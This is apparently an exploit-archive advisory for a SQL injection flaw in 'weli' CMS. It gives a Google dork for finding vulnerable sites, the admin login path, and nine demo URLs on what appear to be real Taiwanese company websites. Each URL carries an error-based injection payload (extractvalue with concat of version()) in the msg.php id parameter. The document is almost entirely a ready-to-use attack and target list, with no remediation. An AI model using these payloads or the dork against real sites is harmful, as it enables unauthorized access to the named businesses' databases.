Weli CMS SQL injection Vulnerability
Posted on 30 November -0001
<HTML><HEAD><TITLE>weli CMS SQL injection Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###################### # Exploit Title : weli SQL injection Vulnerability # # Exploit Author : Ashiyane Digital Security Team # # Vendor Homepage : http://www.welidesign.com.tw/ # # Google Dork : intext:"design by weli" inurl:msg.php?id= # # Date: 2017 03 February # # Tested On : Win 10 / Google Chrome / Mozilla Firefox # ###################### # admin page : target/adm/login.php # # demos : # http://www.atco.com.tw/msg.php?id=6+and+extractvalue%28rand%28%29,concat%280x7e,version%28%29%29%29-- # http://www.forttek.com.tw/msg.php?id=2+and+extractvalue%28rand%28%29,concat%280x7e,version%28%29%29%29-- # http://www.innoteck.com.tw/msg.php?id=1+and+extractvalue%28rand%28%29,concat%280x7e,version%28%29%29%29-- # http://www.launfei-design.com.tw/msg.php?id=1+and+extractvalue%28rand%28%29,concat%280x7e,version%28%29%29%29-- # http://www.seecolor.com.tw/msg.php?id=1+and+extractvalue%28rand%28%29,concat%280x7e,version%28%29%29%29-- # http://www.foryu.com.tw/msg.php?id=1+and+extractvalue%28rand%28%29,concat%280x7e,version%28%29%29%29-- # http://www.amistadauto.com.tw/msg.php?id=1+and+extractvalue%28rand%28%29,concat%280x7e,version%28%29%29%29-- # http://www.doctorgreen.com.tw/msg.php?id=1+and+extractvalue%28rand%28%29,concat%280x7e,version%28%29%29%29-- # http://www.lilongcorp.com.tw/msg.php?id=1+and+extractvalue%28rand%28%29,concat%280x7e,version%28%29%29%29-- # ###################### # # discovered by : modiret # ######################</BODY></HTML>
